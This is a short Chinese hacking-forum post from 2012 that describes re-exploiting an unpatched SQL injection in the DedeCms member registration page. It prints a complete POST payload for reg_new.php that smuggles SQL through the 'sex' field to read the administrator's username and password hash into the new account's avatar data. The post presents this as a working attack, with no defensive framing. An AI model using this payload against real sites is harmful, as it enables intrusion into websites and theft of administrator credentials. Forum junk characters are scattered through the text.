找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2228|回复: 0
打印 上一主题 下一主题

DedeCms SQL注射漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-5 10:03:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
dedecms版本 201211229 B: x: A2 C% y+ I

! a$ `9 p8 |8 x( I9 h6 z+ P需要magic_quotes_gpc=Off
2 M$ D0 E% w& a2 @6 m
2 R% l5 f% g- |' J应该是没有什么大危害的漏洞.
6 q; v, `9 R2 q; f" K, A原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.' u5 g/ @3 k( B* u3 N

" a. p& F: v! z1 k* s3 n是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.$ V0 Z, l- O3 V/ l4 C# ^0 f4 E9 E. g
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
6 Z$ [5 d. e* h2 A4 a8 U, [: b- x
http:///de/member/reg_new.php' Y* A% J$ A, g( q0 t1 P' L

7 L6 G! U7 c# T: ~" t0 yPOST
+ o& t0 D3 I; t4 X# n9 w% _5 p$ u) y
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
6 s3 w& [1 l$ F. u2 h* v5 d+ s* {) R1 c+ f9 c) P8 e
成功注册后,头像处里面有好玩的信息.8 b' U2 p3 c! M8 z
, L5 m+ O$ I. S' ~5 ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表